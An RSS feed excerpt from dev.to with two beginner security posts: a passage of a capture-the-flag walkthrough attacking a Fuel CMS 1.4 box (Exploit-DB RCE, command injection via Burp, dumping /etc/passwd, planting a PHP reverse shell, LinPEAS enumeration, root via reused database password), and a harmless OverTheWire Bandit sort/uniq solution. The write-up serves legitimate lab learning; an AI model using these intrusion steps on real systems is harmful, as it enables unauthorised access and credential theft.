&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--PLUP-iOo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j1lseesseqhv7756zp8e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--PLUP-iOo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j1lseesseqhv7756zp8e.png" alt="Alt Text" width="800" height="99"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Great! We seem to have two RCE exploits available. They seem to be for v1.4.1. They should probably work for v1.4 which is what is installed on our target.&lt;/p&gt;

&lt;p&gt;Let's try out the first one on the list =&amp;gt; &lt;a href="https://www.exploit-db.com/exploits/47138"&gt;47138&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Seems to be a Python script that uses a vulnerability on the "Pages" tab to execute a remote system command. It also seems to be configured to connect to a Burp proxy.&lt;/p&gt;

&lt;p&gt;This configuration will come in handy, as once we have the request in the proxy, we can just repeat the commands in the proxy itself, rather than running the exploit on the command line again and again.&lt;/p&gt;

&lt;p&gt;We'll have to modify the &lt;code&gt;url&lt;/code&gt; variable in the exploit to point to our machine IP.&lt;/p&gt;

&lt;p&gt;Have some doubts if this requires a login. But the exploit does not mention anything about this, so let's just run the exploit as is.&lt;/p&gt;

&lt;p&gt;It seems to work.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--qluaZiAk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vhre0ldnkwmr2hr8t2y6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qluaZiAk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vhre0ldnkwmr2hr8t2y6.png" alt="Alt Text" width="800" height="367"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now instead of running the exploit again on the command line, we just send the Burp request to Repeater so that we can continue to execute commands.&lt;/p&gt;

&lt;p&gt;For more complex commands like &lt;code&gt;ls -l&lt;/code&gt;, we will have to use URL encoding. This tool is particularly useful =&amp;gt; &lt;a href="https://meyerweb.com/eric/tools/dencoder/"&gt;https://meyerweb.com/eric/tools/dencoder/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After trying to &lt;code&gt;ls&lt;/code&gt; the &lt;code&gt;/home/&lt;/code&gt; dir, there is one dir inside it, that is &lt;code&gt;www-data&lt;/code&gt;. Inside it is the user flag.&lt;/p&gt;

&lt;p&gt;To get this, we URL-encode &lt;code&gt;ls -l /home/www-data/&lt;/code&gt; into &lt;code&gt;ls%20-l%20%2Fhome%2Fwww-data%2F&lt;/code&gt; and then add it in the URL, replacing the &lt;code&gt;whoami&lt;/code&gt; command we sent in the very first Burp request.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--f14vBMKb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mcmpj9gwyb7tdqra4p0l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--f14vBMKb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mcmpj9gwyb7tdqra4p0l.png" alt="Alt Text" width="800" height="166"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;flag.txt&lt;/code&gt; is world-readable, so this method can be used to read it.&lt;/p&gt;

&lt;p&gt;Let's try and get the contents of &lt;code&gt;/etc/passwd&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;So there is a local MySQL installation. We will remember this for later. Also there seems to be no other user other than &lt;code&gt;root&lt;/code&gt; on this system(looking at the UIDs).&lt;/p&gt;

&lt;p&gt;Let's try for a reverse shell by simply uploading a php reverse shell file using the Pages section of the admin portal.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--T3z_ppOT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hkf5rlmxfrwusworum68.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--T3z_ppOT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hkf5rlmxfrwusworum68.png" alt="Alt Text" width="800" height="321"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Looks like this is not working.&lt;/p&gt;

&lt;p&gt;After this I tried using Burp Repeater to execute reverse shell commands from &lt;a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"&gt;Payloads all the things reverse shell cheatsheet&lt;/a&gt;. None of them seemed to work. And I then thought, let's try writing the reverse shell command into a script in &lt;code&gt;/tmp/&lt;/code&gt; and then executing it. This is when I noticed something peculiar.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--E_Brfuvp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p3trhm8z1tctdj4qf8r1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--E_Brfuvp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p3trhm8z1tctdj4qf8r1.png" alt="Alt Text" width="800" height="215"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;All the PHP reverse shell files which I had tried to upload using the Pages &amp;gt; Upload view in Fuel CMS, had been copied into &lt;code&gt;/tmp/&lt;/code&gt;. Its very simple now. Using the RCE, issue this command &lt;code&gt;cp /tmp/revshell.php .&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Now we have the reverse shell file in the document root of the webserver. We simple visit &lt;a href="http://MACHINE-IP/revshell.php"&gt;http://MACHINE-IP/revshell.php&lt;/a&gt; to execute the reverse shell. And voila!&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NGSy284J--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tonie8mylyymmm9cenq3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NGSy284J--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tonie8mylyymmm9cenq3.png" alt="Alt Text" width="800" height="279"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  3. Privilege Escalation
&lt;/h3&gt;

&lt;p&gt;Downloaded the privesc scripts &lt;a href="https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh"&gt;lse.sh&lt;/a&gt; and &lt;a href="https://github.com/carlospolop/PEASS-ng/blob/master/linPEAS/linpeas.sh"&gt;LinPEAS&lt;/a&gt; onto the target machine using a Python web server to &lt;code&gt;/tmp/&lt;/code&gt; and then executed them.&lt;/p&gt;

&lt;p&gt;Interesting findings from lse.sh results&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; usr020 Are there other &lt;span class="nb"&gt;users &lt;/span&gt;&lt;span class="k"&gt;in &lt;/span&gt;administrative &lt;span class="nb"&gt;groups&lt;/span&gt;?................. &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
adm:x:4:syslog,oscp
&lt;span class="nb"&gt;sudo&lt;/span&gt;:x:27:oscp

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; usr030 Other &lt;span class="nb"&gt;users &lt;/span&gt;with shell.......................................... &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
root:x:0:0:root:/root:/bin/bash

&lt;span class="o"&gt;[!]&lt;/span&gt; fst020 Uncommon setuid binaries........................................ &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/bin/vmware-user-suid-wrapper

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; fst100 Useful binaries................................................. &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
/usr/bin/dig
/usr/bin/gcc
/bin/nc.openbsd
/bin/nc
/bin/netcat
/usr/bin/wget

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; net000 Services listening only on localhost............................ &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
tcp    LISTEN     0      80     127.0.0.1:3306                  &lt;span class="k"&gt;*&lt;/span&gt;:&lt;span class="k"&gt;*&lt;/span&gt;                  
tcp    LISTEN     0      5      127.0.0.1:631                   &lt;span class="k"&gt;*&lt;/span&gt;:&lt;span class="k"&gt;*&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;oscp&lt;/code&gt; group is probably an easter egg of some sort. Probably of no use.&lt;/p&gt;

&lt;p&gt;Interesting findings from linpeas.sh results&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;╔══════════╣ Analyzing Backup Manager Files &lt;span class="o"&gt;(&lt;/span&gt;limit 70&lt;span class="o"&gt;)&lt;/span&gt;
storage.php Not Found

&lt;span class="nt"&gt;-rwxrwxrwx&lt;/span&gt; 1 root root 4646 Jul 26  2019 /var/www/html/fuel/application/config/database.php
|       &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'password'&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; The password used to connect to the database
|       &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'database'&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; The name of the database you want to connect to
        &lt;span class="s1"&gt;'password'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="s1"&gt;'**CENSORED**'&lt;/span&gt;,
        &lt;span class="s1"&gt;'database'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="s1"&gt;'fuel_schema'&lt;/span&gt;,
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We are able to login to MySQL with the above creds. Although unable to use it for privesc though.&lt;/p&gt;

&lt;p&gt;Now whenever we find a root password of any kind, its a good idea to just try a root login with it. Password re-use is a very common problem after all.&lt;/p&gt;

&lt;p&gt;The password works! We can use this to get the root flag.&lt;/p&gt;

&lt;p&gt;Note: Please watch &lt;a href="https://www.youtube.com/watch?v=f0lDZEBa3_I"&gt;Dark's video walkthrough on Youtube&lt;/a&gt;. It seems I took a roundabout way to get a reverse shell.&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>security</category>
      <category>infosec</category>
    </item>
    <item>
      <title>OverTheWire Bandit Level 8 Level 9 walk-through</title>
      <dc:creator>Krishna</dc:creator>
      <pubDate>Sat, 14 Mar 2020 16:47:57 +0000</pubDate>
      <link>https://dev.to/wandering-geek/overthewire-bandit-level-8-level-9-walk-through-3gni</link>
      <guid>https://dev.to/wandering-geek/overthewire-bandit-level-8-level-9-walk-through-3gni</guid>
      <description>&lt;p&gt;Challenge page =&amp;gt; &lt;a href="https://overthewire.org/wargames/bandit/bandit9.html"&gt;https://overthewire.org/wargames/bandit/bandit9.html&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Level Goal&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The password for the next level is stored in the file data.txt and is the only line of text that occurs only once&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;em&gt;Commands you may need to solve this level&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;grep, sort, uniq, strings, base64, tr, tar, gzip, bzip2, xxd&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This challenge is similar to the last one as well, as it involves searching for the password in a file that already contains a huge amount of text, making manual searching impractical.&lt;/p&gt;

&lt;p&gt;Let's take a look at the file in question shall we?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--1wQCY0nm--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/i/tivx5gm6000u6hembrt2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--1wQCY0nm--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/i/tivx5gm6000u6hembrt2.png" alt="file contents" width="744" height="492"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Normally this is where I would put the &lt;em&gt;Hint 1&lt;/em&gt; part. But if you've been reading the previous walk-throughs and trying to solve this on your own, Google or DuckDuckGo should have been your first goto step. So its a pretty obvious hint.&lt;/p&gt;

&lt;p&gt;Do not hesitate to use the search engines! Its not possible for one person to know everything. Besides, this is a learning process. You will naturally remember the commands after enough practice.&lt;/p&gt;

&lt;p&gt;So, after some web searches, we can safely narrow down the commands required to &lt;code&gt;sort&lt;/code&gt; and &lt;code&gt;uniq&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sort&lt;/code&gt; well, sorts the text files in alphabetical order. &lt;/p&gt;

&lt;p&gt;&lt;code&gt;uniq&lt;/code&gt; (from the DESCRIPTION section in its man file) &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Filter adjacent matching lines from INPUT (or standard input), writing to OUTPUT (or standard output).&lt;br&gt;
With no options, matching lines are merged to the first occurrence.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;So &lt;code&gt;uniq&lt;/code&gt; cannot work on its own, as it needs a file with identical lines adjacent to each other, which will only happen if the file was sorted beforehand.&lt;/p&gt;

&lt;p&gt;So we will need to pipe the output of sort to uniq to get the unique lines. Let's try it out shall we?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--qUMAsDiQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/i/1po64wp676orwkwfiyx6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qUMAsDiQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/i/1po64wp676orwkwfiyx6.png" alt="unique lines of data.txt" width="653" height="547"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Well, that didn't go as planned. Looks like we should have paid more attention to the documentation!&lt;/p&gt;

&lt;p&gt;Turns out, &lt;code&gt;uniq&lt;/code&gt; filters out duplicate lines that are adjacent to each other, and sends the original to &lt;code&gt;stdout&lt;/code&gt;. But the password is on the &lt;em&gt;only line of text that occurs only once&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;How do we get &lt;code&gt;uniq&lt;/code&gt; to print out only those lines that occur only once in its input stream?&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Hint:&lt;/em&gt; Look in the man page :)&lt;/p&gt;




&lt;p&gt;Turns out &lt;code&gt;uniq&lt;/code&gt; has a pretty convenient flag &lt;code&gt;-u&lt;/code&gt; that ensures &lt;em&gt;only&lt;/em&gt; unique lines are printed.&lt;/p&gt;

&lt;p&gt;So the final command would be &lt;code&gt;sort data.txt | uniq -u&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--k7EGW4bE--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/i/vdceuvocthez2bl7xp5b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--k7EGW4bE--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/i/vdceuvocthez2bl7xp5b.png" alt="Solution" width="593" height="126"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Onto the next challenge!&lt;/p&gt;

</description>
      <category>security</category>
      <category>beginners</category>
      <category>infosec</category>
      <category>ctf</category>
    </item>
  </channel>
</rss>
